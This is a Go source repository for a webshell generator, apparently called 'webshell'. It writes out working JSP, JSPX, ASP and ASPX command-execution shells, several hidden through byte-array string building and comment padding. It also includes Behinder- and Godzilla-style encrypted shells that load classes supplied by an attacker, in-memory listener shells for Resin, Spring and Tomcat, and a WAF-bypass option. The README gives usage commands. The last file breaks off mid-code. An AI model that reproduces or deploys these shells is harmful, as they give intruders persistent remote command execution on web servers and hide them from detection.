├── go.mod ├── code ├── ucoide.go ├── readme.txt ├── unkown.go ├── Md5.go └── unicode.go ├── .gitattributes ├── common ├── Parse.go ├── file.go ├── randstr.go ├── config.go └── flag.go ├── main.go ├── shell ├── php.go ├── Behinder │ └── jspshell.go ├── plugin.go ├── java.go ├── Godzilla │ └── jspshell.go ├── memory │ ├── Behinder │ │ ├── BeResin │ │ │ ├── BeRase128.go │ │ │ └── BeRxor.go │ │ ├── Bespring │ │ │ ├── Behsaes128.go │ │ │ └── Behxor.go │ │ └── Betomcat │ │ │ ├── Bettaes128.go │ │ │ └── Bettxor.go │ └── Godzilla │ │ ├── GoResin │ │ └── GoResin128.go │ │ ├── GoSpring │ │ └── GoSpring128.go │ │ └── JDK │ │ └── HttpServlet.go └── bypass │ └── bypassphp.go └── README.md /go.mod: -------------------------------------------------------------------------------- 1 | module webshell 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /code/ucoide.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | func Uncoide() { 4 | //后续开发 5 | } 6 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /code/readme.txt: -------------------------------------------------------------------------------- 1 | 此目录文件用于普通的php和jsp加密 2 | 3 | The files in this directory are used for ordinary PHP and JSP encryption. -------------------------------------------------------------------------------- /code/unkown.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | func Base64() { 4 | //fmt.Println(common.Webshells, shell.Aaaa) 5 | //后续开发 6 | } 7 | -------------------------------------------------------------------------------- /common/Parse.go: 
-------------------------------------------------------------------------------- 1 | package common 2 | 3 | import "os" 4 | 5 | func Parse1() { 6 | Paseshell() 7 | } 8 | 9 | func Paseshell() { 10 | if Webshell == " " && Password == " " { 11 | os.Exit(0) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /common/file.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "os" 5 | ) 6 | 7 | func File() { 8 | r, _ := os.OpenFile(Filename, os.O_CREATE, 0644) 9 | defer func() { r.Close() }() 10 | _, err := r.WriteString(Webshells) 11 | if err != nil { 12 | return 13 | } 14 | 15 | } 16 | -------------------------------------------------------------------------------- /code/Md5.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | import ( 4 | "crypto/md5" 5 | "fmt" 6 | "webshell/common" 7 | ) 8 | 9 | func Md5(a string) string { 10 | b := md5.Sum([]byte(common.Password)) // 加密数据 11 | //fmt.Printf("%x",b) // 转换为16进制,并打印 12 | a = fmt.Sprintf("%x", b) 13 | return a 14 | } 15 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "time" 6 | "webshell/common" 7 | "webshell/shell" 8 | ) 9 | 10 | func main() { 11 | start := time.Now() 12 | shell.Exec() 13 | end := time.Now().Sub(start) 14 | fmt.Println("[*]FileName:", common.Filename, "\n[*]Password:", common.Password, "\n[*]生成耗时:", end) 15 | } 16 | -------------------------------------------------------------------------------- /shell/php.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import ( 4 | "webshell/common" 5 | ) 6 | 7 | //哥斯拉 8 | 9 | //冰蝎 10 | 11 | //bypass 12 | 13 | func Php() { 14 | common.Filename = common.RandStr(10) 
+ `.php` 15 | common.Webshells = `` 16 | } 17 | -------------------------------------------------------------------------------- /common/randstr.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "math/rand" 5 | "time" 6 | ) 7 | 8 | func RandStr(length int) string { 9 | str := "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 10 | bytes := []byte(str) 11 | result := []byte{} 12 | rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100))) 13 | for i := 0; i < length; i++ { 14 | result = append(result, bytes[rand.Intn(len(bytes))]) 15 | } 16 | return string(result) 17 | } 18 | 19 | -------------------------------------------------------------------------------- /common/config.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | var ( 4 | i int 5 | Php string 6 | Webshell string 7 | Password string 8 | Help bool 9 | Pass string 10 | shellphp string 11 | php string 12 | jsp string 13 | jspx string 14 | asp string 15 | aspx string 16 | Filename string 17 | Webshells string 18 | Encode string 19 | Javaweb string 20 | titles string 21 | ) 22 | 23 | var ( 24 | tomcat string 25 | spring string 26 | resin string 27 | jdk string 28 | Memory string 29 | Bypass string 30 | Lei string 31 | ) 32 | -------------------------------------------------------------------------------- /code/unicode.go: -------------------------------------------------------------------------------- 1 | package code 2 | 3 | import ( 4 | "fmt" 5 | "strconv" 6 | "unicode" 7 | ) 8 | 9 | func Unicode(str string) string { 10 | DD := []rune(str) //需要分割的字符串内容,将它转为字符,然后取长度。 11 | finallStr := "" 12 | for i := 0; i < len(DD); i++ { 13 | if unicode.Is(unicode.Scripts["Han"], DD[i]) { 14 | textQuoted := strconv.QuoteToASCII(string(DD[i])) 15 | finallStr += textQuoted[1 : len(textQuoted)-1] 16 | } else { 17 | h := fmt.Sprintf("%x", DD[i]) 18 | finallStr += 
"\\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu" + isFullFour(h) 19 | } 20 | } 21 | return finallStr 22 | } 23 | 24 | func isFullFour(str string) string { 25 | if len(str) == 1 { 26 | str = "000" + str 27 | } else if len(str) == 2 { 28 | str = "00" + str 29 | } else if len(str) == 3 { 30 | str = "0" + str 31 | } 32 | return str 33 | } 34 | -------------------------------------------------------------------------------- /shell/Behinder/jspshell.go: -------------------------------------------------------------------------------- 1 | package Behinder 2 | 3 | import "webshell/common" 4 | 5 | func Jspshell() { 6 | common.Filename = common.RandStr(5) 7 | common.Webshells = `<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %> 8 | <%! 9 | private byte[] Decrypt(byte[] data) throws Exception 10 | { 11 | String key="e45e329feb5d925b"; //md5[0:16] 12 | for (int i = 0; i < data.length; i++) { 13 | data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15])); 14 | } 15 | return data; 16 | } 17 | %> 18 | <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return 19 | super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){ 20 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 21 | byte[] buf = new byte[512]; 22 | int length=request.getInputStream().read(buf); 23 | while (length>0) 24 | { 25 | byte[] data= Arrays.copyOfRange(buf,0,length); 26 | bos.write(data); 27 | length=request.getInputStream().read(buf); 28 | } 29 | out.clear(); 30 | out=pageContext.pushBody(); 31 | new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);} 32 | %>` 33 | } 34 | -------------------------------------------------------------------------------- /common/flag.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "os" 7 | "runtime" 8 | "runtime/debug" 9 | "time" 10 | ) 11 | 12 | func init() { 
13 | go func() { 14 | for { 15 | GC() 16 | time.Sleep(5 * time.Second) 17 | } 18 | }() 19 | } 20 | 21 | func GC() { 22 | runtime.GC() 23 | debug.FreeOSMemory() 24 | } 25 | 26 | func title() { 27 | titles = ` 28 | 29 | _ _ _ _ 30 | __ _____| |__ ___| |__ ___| | | 31 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | | 32 | \ V V / __/ |_) \__ \ | | | __/ | | 33 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_| 34 | version 1.1 35 | -p password | Default password noway 36 | -s php | jsp | asp | aspx 37 | -e xor | aes 38 | -d be | god 39 | ` 40 | fmt.Println(titles) 41 | } 42 | 43 | func Flag() { 44 | title() 45 | flag.StringVar(&Webshell, "s", "", "-s php | jsp | asp | aspx") 46 | flag.StringVar(&Password, "p", " ", "-p password") 47 | flag.BoolVar(&Help, "h", false, "help") 48 | flag.StringVar(&Encode, "e", "", " unicode:such as -d be -e unicode |xor aes 128 only Behinder and Godzilla") 49 | flag.StringVar(&Memory, "d", "", "-d Behinder(Be) | Godzilla(God) ") 50 | flag.StringVar(&Bypass, "b", "", "something bypass waf | php ") 51 | flag.StringVar(&Lei, "l", "", "-l spring tomcat resin jdk") 52 | flag.Parse() 53 | if Help { 54 | flag.PrintDefaults() 55 | os.Exit(0) 56 | } 57 | return 58 | } 59 | -------------------------------------------------------------------------------- /shell/plugin.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import ( 4 | "webshell/common" 5 | "webshell/shell/Godzilla" 6 | "webshell/shell/bypass" 7 | "webshell/shell/memory/Behinder/BeResin" 8 | "webshell/shell/memory/Behinder/Bespring" 9 | "webshell/shell/memory/Behinder/Betomcat" 10 | "webshell/shell/memory/Godzilla/GoResin" 11 | "webshell/shell/memory/Godzilla/GoSpring" 12 | "webshell/shell/memory/Godzilla/Gotomcat" 13 | "webshell/shell/memory/Godzilla/JDK" 14 | ) 15 | 16 | func Exec() { 17 | common.Flag() 18 | Common() 19 | Bypass() 20 | Meme() 21 | common.File() 22 | } 23 | 24 | func Common() { 25 | if common.Password == " " { 26 | 
common.Password = common.RandStr(5) 27 | } 28 | if common.Webshell != " " { 29 | switch common.Webshell { 30 | case "php": 31 | Php() 32 | case "asp": 33 | Asp() 34 | case "jsp": 35 | Jsp() 36 | case "aspx": 37 | Aspx() 38 | case "jspx": 39 | Jspx() 40 | } 41 | } 42 | } 43 | 44 | func Meme() { 45 | if common.Memory == "be" && common.Encode == "xor" && common.Lei != "" { 46 | switch common.Lei { 47 | case "spring": 48 | Bespring.Behxor() 49 | case "tomcat": 50 | Betomcat.TomXorbL() 51 | case "resin": 52 | BeResin.BeRxor() 53 | } 54 | } 55 | if common.Memory == "Be" && common.Encode == "aes" && common.Lei != "" { 56 | switch common.Lei { 57 | case "spring": 58 | Bespring.BeS128() 59 | case "tomcat": 60 | Betomcat.TomactLis() 61 | case "resin": 62 | BeResin.BeRase128() 63 | } 64 | } 65 | if common.Memory == "God" && common.Encode == "aes" && common.Lei != " " { 66 | switch common.Lei { 67 | case "spring": 68 | GoSpring.GoSpringInterceptor() 69 | case "tomcat": 70 | Gotomcat.GoTomcatServlet() 71 | case "resin": 72 | GoResin.GoResin128() 73 | case "jdk": 74 | JDK.HttpServlet() 75 | } 76 | } 77 | } 78 | 79 | func Bypass() { 80 | if common.Bypass != " " { 81 | switch common.Bypass { 82 | case "php": 83 | bypass.Phpbypass() 84 | } 85 | } 86 | if common.Memory == "be" && common.Encode == "unicode" { 87 | Godzilla.Jspun() 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 1.2: 2 | 3 | ``` 4 | 1:Unicode编码,目前只支持哥斯拉jsp编码 5 | 2:当未指定密码时,将生成随机的密码,随机的文件名 6 | ``` 7 | 8 | ![img](https://pic.certbug.com/i/2023/02/28/xqtkxd.webp) 9 | 10 | 11 | 12 | 1.1: 13 | 14 | ``` 15 | 16 | _ _ _ _ 17 | __ _____| |__ ___| |__ ___| | | 18 | \ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | | 19 | \ V V / __/ |_) \__ \ | | | __/ | | 20 | \_/\_/ \___|_.__/|___/_| |_|\___|_|_| 21 | vsersion 1.1 22 | -p password | Default password noway 23 | -s php | jsp | asp | aspx 24 | 
-e xor | aes 25 | -d be | god 26 | 27 | -b string 28 | something bypass waf | php 29 | -d string 30 | -d Behinder(Be) | Godzilla(God) 31 | -e string 32 | xor aes 128 only Behinder and Godzilla 33 | -h help 34 | -l string 35 | -l spring tomacat resin jdk 36 | -p string 37 | -p password (default "noway") 38 | -s string 39 | -s php | jsp | asp | aspx 40 | 41 | ``` 42 | 43 | There are some tips you can get : 44 | 45 | ``` 46 | Generate memory shell 47 | Usage of God 48 | tomcat: 49 | .\webshell.exe -d God -e aes -l tomcat 50 | spring: 51 | .\webshell.exe -d God -e aes -l spring 52 | resin: 53 | .\webshell.exe -d God -e aes -l resin 54 | jdk: 55 | .\webshell.exe -d God -e aes -l jdk 56 | 57 | 58 | Usage of Be (xor aes) 59 | tomcat: 60 | .\webshell.exe -d be -e xor -l tomcat 61 | spring: 62 | .\webshell.exe -d be -e xor -l spring 63 | resin: 64 | .\webshell.exe -d be -e xor -l resin 65 | 66 | ``` 67 | 68 | what is more you need to konw is that Godzilla only has aes code 69 | 70 | About the bypass option, only generation is currently supported And only php>7.0 is supported 71 | 72 | ``` 73 | The following is general usage 74 | .\webshell.exe -s php -p 666 75 | ``` 76 | 77 | ![img](https://pic.certbug.com/i/2023/02/28/xqtbhl.webp) 78 | 79 | ![img](https://pic.certbug.com/i/2023/02/28/xqtwzh.webp) 80 | 81 | End:Update every two months 82 | 83 | 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /shell/java.go: -------------------------------------------------------------------------------- 1 | package shell 2 | 3 | import "webshell/common" 4 | 5 | func Jsp() { 6 | common.Filename = "xxxxxkka.jsp" 7 | common.Webshells = `<% String AY85C = request.getParameter("` + common.Password + `");ProcessBuilder pb;if(String.valueOf(java.io.File.separatorChar).equals("\\")){pb = new ProcessBuilder(new /*ZU9HS9ML28*/String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), AY85C);}else{pb = new 
ProcessBuilder/*ZU9HS9ML28*/(new/*ZU9HS9ML28*/String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), AY85C);}if (AY85C != null) {Process process = pb.start();java.util.Scanner EB7vGQh7 = new java.util.Scanner(process.getInputStream()).useDelimiter("\\A");String op="";op = EB7vGQh7.hasNext() ? EB7vGQh7.next() : op;EB7vGQh7.close();out.print(op);}else {response.sendError(404);} %>` 8 | } 9 | 10 | func Jspx() { 11 | common.Filename = "xxxxkkka.jspx" 12 | common.Webshells = ` 13 | 14 |

15 | String Af8uW = request.getParameter("` + common.Password + `");ProcessBuilder pb;if(String.valueOf(java.io.File.separatorChar).equals("\\")){pb = new ProcessBuilder(new /*Z24pg1a5rQ*/String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), Af8uW);}else{pb = new ProcessBuilder/*Z24pg1a5rQ*/(new/*Z24pg1a5rQ*/String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), Af8uW);}if (Af8uW != null) {Process process = pb.start();java.util.Scanner E683BD82 = new java.util.Scanner(process.getInputStream()).useDelimiter("\\A");String op="";op = E683BD82.hasNext() ? E683BD82.next() : op;E683BD82.close();out.print(op);}else {response.sendError(404);}
16 | 
` 17 | } 18 | 19 | func Asp() { 20 | common.Filename = "xxxxkkka.aspx" 21 | common.Webshells = `<% 22 | 32 | %>` 33 | } 34 | 35 | func Aspx() { 36 | common.Filename = "xxxxkkka.asp" 37 | common.Webshells = `<% function Ekj04pi9(){var GEPH="unsa",YACK="fe",CCi7=GEPH+YACK;return CCi7;}var PAY:String=Request["` + common.Password + `"];~eval/*ZlA9h2RV68*/(PAY,Ekj04pi9());%><%@Page Language=JS%>` 38 | } 39 | -------------------------------------------------------------------------------- /shell/Godzilla/jspshell.go: -------------------------------------------------------------------------------- 1 | package Godzilla 2 | 3 | import ( 4 | "webshell/code" 5 | "webshell/common" 6 | ) 7 | 8 | func Jspshell() { 9 | common.Filename = common.RandStr(5) + `.jsp` 10 | common.Webshells = `<%! String xc="` + code.Md5(common.Password)[0:16] + `"; 11 | String pass="` + common.Password + `"; 12 | String md5=md5(pass+xc); 13 | class X extends ClassLoader { 14 | public X(ClassLoader z) { 15 | super(z); 16 | } 17 | 18 | public Class Q(byte[] cb) { 19 | return super.defineClass(cb, 0, cb.length); 20 | } 21 | } 22 | public byte[] x(byte[] s,boolean m) { 23 | try { 24 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 25 | c.init(m ? 
1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 26 | return c.doFinal(s); 27 | } catch (Exception e) { 28 | return null; 29 | } 30 | } 31 | public static String md5(String s) { 32 | String ret = null;try { 33 | java.security.MessageDigest m; 34 | m = java.security.MessageDigest.getInstance("MD5"); 35 | m.update(s.getBytes(), 0, s.length()); 36 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 37 | } 38 | catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception { 39 | Class base64;String value = null;try { 40 | base64 = Class.forName("java.util.Base64"); 41 | Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); 42 | value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 43 | } 44 | catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new 
X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){ 45 | } 46 | %>` 47 | } 48 | 49 | func Jspxshell() { 50 | common.Filename = common.RandStr(5) + `.jspx` 51 | common.Webshells = ` 52 | 53 | String xc = "` + code.Md5(common.Password)[0:16] + `"; 54 | String pass = "` + common.Password + `; 55 | String md5 = md5(pass + xc); 56 | 57 | class X extends ClassLoader { 58 | public X(ClassLoader z) { 59 | super(z); 60 | } 61 | 62 | public Class Q(byte[] cb) { 63 | return super.defineClass(cb, 0, cb.length); 64 | } 65 | } 66 | 67 | public byte[] x(byte[] s, boolean m) { 68 | try { 69 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 70 | c.init(m ? 
1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 71 | return c.doFinal(s); 72 | } catch (Exception e) { 73 | return null; 74 | } 75 | } 76 | 77 | public static String md5(String s) { 78 | String ret = null; 79 | try { 80 | java.security.MessageDigest m; 81 | m = java.security.MessageDigest.getInstance("MD5"); 82 | m.update(s.getBytes(), 0, s.length()); 83 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 84 | } catch (Exception e) { 85 | } 86 | return ret; 87 | } 88 | 89 | public static String base64Encode(byte[] bs) throws Exception { 90 | Class base64; 91 | String value = null; 92 | try { 93 | base64 = Class.forName("java.util.Base64"); 94 | Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); 95 | value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 96 | } catch (Exception e) { 97 | try { 98 | base64 = Class.forName("sun.misc.BASE64Encoder"); 99 | Object Encoder = base64.newInstance(); 100 | value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs}); 101 | } catch (Exception e2) { 102 | } 103 | } 104 | return value; 105 | } 106 | 107 | public static byte[] base64Decode(String bs) throws Exception { 108 | Class base64; 109 | byte[] value = null; 110 | try { 111 | base64 = Class.forName("java.util.Base64"); 112 | Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); 113 | value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); 114 | } catch (Exception e) { 115 | try { 116 | base64 = Class.forName("sun.misc.BASE64Decoder"); 117 | Object decoder = base64.newInstance(); 118 | value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); 119 | } catch (Exception e2) { 120 | } 121 | } 122 | return value; 123 | } 124 | 125 | 126 | 
try { 127 | byte[] data = base64Decode(request.getParameter(pass)); 128 | data = x(data, false); 129 | if (session.getAttribute("payload") == null) { 130 | session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data)); 131 | } else { 132 | request.setAttribute("parameters", data); 133 | java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); 134 | Object f = ((Class) session.getAttribute("payload")).newInstance(); 135 | f.equals(arrOut); 136 | f.equals(pageContext); 137 | response.getWriter().write(md5.substring(0, 16)); 138 | f.toString(); 139 | response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); 140 | response.getWriter().write(md5.substring(16)); 141 | } 142 | } catch (Exception e) { 143 | } 144 | 145 | ` 146 | } 147 | -------------------------------------------------------------------------------- /shell/memory/Behinder/BeResin/BeRase128.go: -------------------------------------------------------------------------------- 1 | package BeResin 2 | 3 | import "webshell/common" 4 | 5 | func BeRase128() { 6 | common.Filename = "ResinListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class ResinListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, 
field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... 
args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 232 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 233 | for (Object listener: listeners) { 234 | if (listener instanceof Proxy) { 235 | return; 236 | } 237 | } 238 | Class WebApp = webApp.getClass(); 239 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 240 | WebApp = WebApp.getSuperclass(); 241 | } 242 | Method addListenerObject = getMethodX( 243 | WebApp, "addListenerObject", 2 244 | ); 245 | addListenerObject.setAccessible(true); 246 | addListenerObject.invoke(webApp, proxyObject, true); 247 | } 248 | 249 | public ResinListener() { 250 | synchronized(lock) { 251 | Class servletRequestListener = null; 252 | try { 253 | servletRequestListener = Class.forName( 254 | "javax.servlet.ServletRequestListener" 255 | ); 256 | } catch (ClassNotFoundException e) {} 257 | 258 | if (servletRequestListener != null) { 259 | Object proxyObject = Proxy.newProxyInstance( 260 | getLoader(), new Class[]{servletRequestListener}, this 261 | ); 262 | try { 263 | addListener(proxyObject); 264 | } catch (Exception e) {} 265 | } 266 | } 267 | } 268 | 269 | static { 270 | new ResinListener(); 271 | } 272 | } 273 | ` 274 | } 275 | -------------------------------------------------------------------------------- /shell/memory/Behinder/BeResin/BeRxor.go: -------------------------------------------------------------------------------- 1 | package BeResin 2 | 3 | import "webshell/common" 4 | 5 | func BeRxor() { 6 | common.Filename = "ResinListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class ResinListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return 
null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... 
args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 234 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 235 | for (Object listener: listeners) { 236 | if (listener instanceof Proxy) { 237 | return; 238 | } 239 | } 240 | Class WebApp = webApp.getClass(); 241 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 242 | WebApp = WebApp.getSuperclass(); 243 | } 244 | Method addListenerObject = getMethodX( 245 | WebApp, "addListenerObject", 2 246 | ); 247 | addListenerObject.setAccessible(true); 248 | addListenerObject.invoke(webApp, proxyObject, true); 249 | } 250 | 251 | public ResinListener() { 252 | synchronized(lock) { 253 | Class servletRequestListener = null; 254 | try { 255 | servletRequestListener = Class.forName( 256 | "javax.servlet.ServletRequestListener" 257 | ); 258 | } catch (ClassNotFoundException e) {} 259 | 260 | if (servletRequestListener != null) { 261 | Object proxyObject = Proxy.newProxyInstance( 262 | getLoader(), new Class[]{servletRequestListener}, this 263 | ); 264 | try { 265 | addListener(proxyObject); 266 | } catch (Exception e) {} 267 | } 268 | } 269 | } 270 | 271 | static { 272 | new ResinListener(); 273 | } 274 | } 275 | ` 276 | } 277 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Bespring/Behsaes128.go: -------------------------------------------------------------------------------- 1 | package Bespring 2 | 3 | import "webshell/common" 4 | 5 | func BeS128() { 6 | common.Filename = "SpringInterceptor.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class SpringInterceptor implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 
| return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class 